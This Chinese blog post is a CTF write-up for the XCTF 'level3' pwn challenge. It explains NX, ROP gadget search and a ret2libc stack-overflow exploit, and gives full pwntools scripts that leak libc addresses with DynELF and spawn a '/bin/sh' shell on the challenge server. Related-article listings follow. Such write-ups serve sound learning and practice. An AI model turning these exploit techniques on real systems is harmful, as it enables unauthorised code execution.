xctf level3--沙窝李的王

最新推荐文章于 2023-06-30 11:32:54 发布
最新推荐文章于 2023-06-30 11:32:54 发布
阅读量949 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43600412/article/details/97433378
版权

通过直接实战学习知识,这还是第一次这样学习,感觉到了压力-_-…
level3
在这里插入图片描述

可以看到NX保护打开,也就是不能在栈中执行指令辽。
由于不知道NX保护的原理机制,特查询如下:
NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。
在这里插入图片描述
拖入ida查询主函数内容
在这里插入图片描述
描述很明显的栈溢出漏洞,但是没有system函数和/bin/sh字符串了,一个新的模式:先通过泄露函数got表中的地址获取到库中某个函数的真正加载地址,再通过通过偏移找出函数的库,通过然后找出其他函数的真正加载地址,包括system函数也包括/bin/sh字符串
构造payload:
payload=’A’*0x88+’A’*4+p32(plt_write)+p32(main_addr)+p32(1)+p32(got_write)+p32(4)//这一部分是为了泄露出来write 函数的got表内容
payload = “A” * 0x88 + “A” * 4 + p32(plt_read) + p32(pop_pop_pop_ret) + p32(0) + p32(bss_addr) + p32(8)//这一部分会返等待输入,把输入的内容放到bss_addr。返回地址pop_pop_pop_ret保证堆栈平衡
payload+=p32(system_addr)+p32(0x77777777)+p32(bin_sh_addr)//这一部分是为了执行system(“/bin/sh”)函数。

会执行system(“/bin/sh”)是因为发送过去的payload在函数返回的时候才会起作用。

0x01 获取pop
程序开启了NX保护,pop_pop_pip_ret不能使我们传进栈中的,只能用程序本身自己带的,那么怎么找呢,能不能找到呢
pwntoos给我们提供了工具ROPgadget–binary是搜索的目录,–only是搜索的内容。还可以加上|grep来过滤。
liu@liu-F117-F:~/桌面/oj/level3$ ROPgadget --binary level3 --only “pop|ret”


0x0804851b : pop ebp ; ret
0x08048518 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080482f1 : pop ebx ; ret
0x0804851a : pop edi ; pop ebp ; ret
0x08048519 : pop esi ; pop edi ; pop ebp ; ret
0x080482da : ret
0x080483ce : ret 0xeac1

Unique gadgets found: 7

运行这段代码就能获取到write函数的运行地址(放在write_addr里面)。
运行结果为write_addr=0xf7dfad80 。

from pwn import *
pop_pop_pop_ret=0x08048519
elf=ELF(“level3”)
plt_write=elf.plt[“write”]
got_write=elf.got[“write”]

#p=process("./level3")
p=remote(“pwn2.jarvisoj.com”,9879)
p.recvline()
payload=“A”*0x88+“A”*4+p32(plt_write)+p32(pop_pop_pop_ret)+p32(1)+p32(got_write)+p32(4)
p.sendline(payload)
write_addr=u32(p.recv(4))
print “write_addr=”+hex(write_addr

最终脚本:


from pwn import *
#context.log_level="debug"
pop_pop_pop_ret=0x08048519
elf=ELF("level3")
main_addr=0x08048484
plt_write=elf.plt["write"]
def leak(address):
    p.recvline()
    payload = "A" * 0x88 + "A" * 4 + p32(plt_write) + p32(main_addr) + p32(1) + p32(address) + p32(4)
    p.send(payload)
    data=p.recv(4)
    print hex(u32(data))
    print "%#x => %s" % (address,(data  or '').encode('hex'))
    return data
p=remote("pwn2.jarvisoj.com",9879)
#p=process("./level3")
d=DynELF(leak,elf=ELF("./level3"))
system_addr=d.lookup('system','libc')
print "system_addr="+hex(system_addr)

bss_addr=0x0804a024
plt_read=elf.plt["read"]
p.recvline()
sleep(1)
payload = "A" * 0x88 + "A" * 4 + p32(plt_read) + p32(pop_pop_pop_ret) + p32(0) + p32(bss_addr) + p32(8)
payload+=p32(system_addr)+p32(0x77777777)+p32(bss_addr)
raw_input()
p.sendline(payload)
p.sendline("/bin/sh")
p.interactive()

放到ubunt虚拟机中运行即可出答案
---------------------

沙窝李
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
xctf pwn 踩坑笔记(一):以xctf入门题level3为例
xiongzixun的博客
10-30 493
操作环境:ubuntu16.04 +惠普台式机 IDA环境:win10 +联想笔记本** 1.打开文件 xctf中的附件一般为application/octet-stream 而且为了能够使用,我们必须要先通过chmod命令获得X权限 如果是压缩文件还要先unzip或者tar等试一下 然后,通过checksec 这个文件以后,一定要先关注Arch,也就是这个ELF究竟是64位,还是32位。 因...
level3(xctf)
weixin_43868725的博客
05-06 468
0x0 程序保护和流程 保护: 流程: main() vulnerable_function() 很明显的栈溢出。 0x1 利用过程 整个程序中没有我们能利用的部分,但是题目给我们提供了一个libc。所以可以通过泄露got表的地址获取libc的基地址。libc中有system()函数,还有"/bin/sh"。因此我们先使用write()泄露got表中的地址计算出libc的基地址调用完成之后返...
xctflevel3
neuisf的博客
01-04 762
未调试,可能由错误! from pwn import * from LibcSearcher import * p=process('./level3') elf=ELF("./level3") write_plt=elf.plt["write"] read_plt=elf.plt["read"] #0x8048310 print "readplt:"+str(hex(read_plt)) ...
XCTF PWN level3
qq_41743240的博客
04-14 381
检查一下保护机制 开了NX,不能执行shellcode,首先选择ROP方式获取shell 通过IDA反编译调试, 发现在vulnerable_function函数这里存在溢出漏洞 查询一下有没有可利用函数 无system和/bin/sh 本题可以有两种解题思路 思路一 根据题目给出的libc泄露system和/bin/sh 该如何泄露呢? 这里有一个公式: libc函数 = 程序函数 ...
CTF-PWN-level3(Jarvis OJ)
SuperGate的博客
02-15 456
发现这个系列的题构造都差不多……不过不同的是这道题中没有给出system的地址。 checksec一下发现cannary没开,于是分析read函数,发现可以栈溢出。 基本思路就是先利用第二个write函数打印出write函数的got表地址。然后再在给出的libc库中找到write函数的地址,计算偏移值offset。再从libc库中找到system,/bin/sh的地址,通过offset和栈溢出...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-HW-pipeline附件
最新发布
11-09
附件
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
XCTF-MISC-新手区:ext3
1stPeak's Blog
12-03 2489
题目: 我们下载附件1,看看里面有什么 发现上图所示的一个文件,总共有两种解决方案: 1、放入Winhex 2、根据题目ext3,可以使用Linux进行挂载(ext3是一个日志文件系统,常用于Linux操作系统) 方案一: 将文件直接放入Winhex,找到flag.txt,但是我们如何打开呢? 此时,我们可以尝试,将目标文件后缀改为zip,进行解压,从而得到文件中的flag.txt文件 发...
ext3.3正式版发布
05-29
NULL 博文链接:https://zfwdl2005.iteye.com/blog/1002389
工程伦理学(第一讲).pdf
10-12
工程伦理学讲义第一讲,工程与工程师
XCTF MISC 新手区 ext3
duwanglai的博客
01-03 195
ext3 ext3是linux下的文件系统,由题目描述可知附件为linux系统光盘文件。 对于光盘镜像文件在linux系统下的挂载,可以先建立一个目录作为挂载点再使用mount命令挂载。 打开kali虚拟机,mkdir xctf 新建文件夹xctf作为挂载点,mount 下载的附件名 xctf 挂载 find ./ -name “flag*” 得到一串base64编码,解码可得flag flag{sajbcibzskjjcnbhsbvcjbjszcszbkzj} ...
XCTF-杂项-ext3
x1871329637的博客
04-09 3730
首先下载文件根据提示先放到kali当中,Linux光盘的话需要挂载 创建一个目录作为挂载点 再用命令mount将文件挂载到xctf这个文件夹中 直接上图了 发现base64加密 拿到flag。 ...
计算机网络 物理层--沙窝
weixin_43600412的博客
05-15 221
一.物理层基本概念: 1.机械特性约束:指明接口所用接线器的形状,性质,尺寸,引线数目排列,固定和锁定装置等。 2.电气特性约束:约定电压范围。 3.功能特性:指明某种电压表示的意义,比如什么范围的电压代表高电频,与电气特性有一种相互对照关系。 4.规程特性:指明对于不同功能的格子可能事件出现顺序,比如报文的小组划分,组装的顺序。 二.数据通信系统: 源系统: 1.源点:源点设备产生的要传输的数据...
XCTF ics-04
qq_41941506的博客
05-20 2825
根据题目提示在登录及注册中有漏洞 首先进入登录界面,寻求漏洞,BP抓包,发现为明文传输,第一个想到爆破,但是爆破结果不尽人意,没有任何用出;接下来进行SQL注入尝试,但是俩个界面均没有POST注入漏洞,正要放弃时,发现在登录界面还有一个忘记密码界面,尝试在该界面进行SQL注入, python2 sqlmap.py -r post.txt --dump -C "username,password...
XCTF 攻防世界 MISC杂项 新手练习区
qq_44657899的博客
01-26 2474
Training-Stegano-1 直接用winhex打开得到flag。 János-the-Ripper 解压出来winhex发现仍是压缩文件,改后缀为zip,打开后是txt加密文件。 然后用ARCHPR爆破 Test-flag-please-ignore 解压后打开是一串字符。 666c61677b68656c6c6f5f776f726c647d 发现没有f以后的字符猜测是16进制,解...
《工程伦理》 正风、丛杭青、前 等 思考与讨论(课后习题)答案
热门推荐
Waldocsdn的博客
06-30 1万+
(1)首先伦理责任不等同于法律责任,伦理责任属于“事先责任”,相对于法律责任,伦理责任对责任人的要求更高。法律责任是社会为社会成员划定的一种底线,但是仅仅靠法律责任还不能够解决人们生活中遇到的所有问题,人们还必须上升到更高的伦理责任要求。其次,伦理责任也不等同于职业责任,职业责任是工程师履行本职工作时应尽的岗位责任,而伦理责任是为了社会和公众利益需要承担的维护公平正义等理论原则的责任。
各种电子书、pdf
weixin_33882443的博客
05-31 3763
剑指offer第二版:链接:https://pan.baidu.com/s/1ABn3p9wY_kiQUzDRefZUqA提取码:d30v 网络是怎样连接的:链接:https://pan.baidu.com/s/1qVbqFFPSNKRroeyH0A-YGQ提取码:vhpn 程序员的数学:链接:https://pan.baidu.com/s/1yHg1tqfcEtfXF...
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值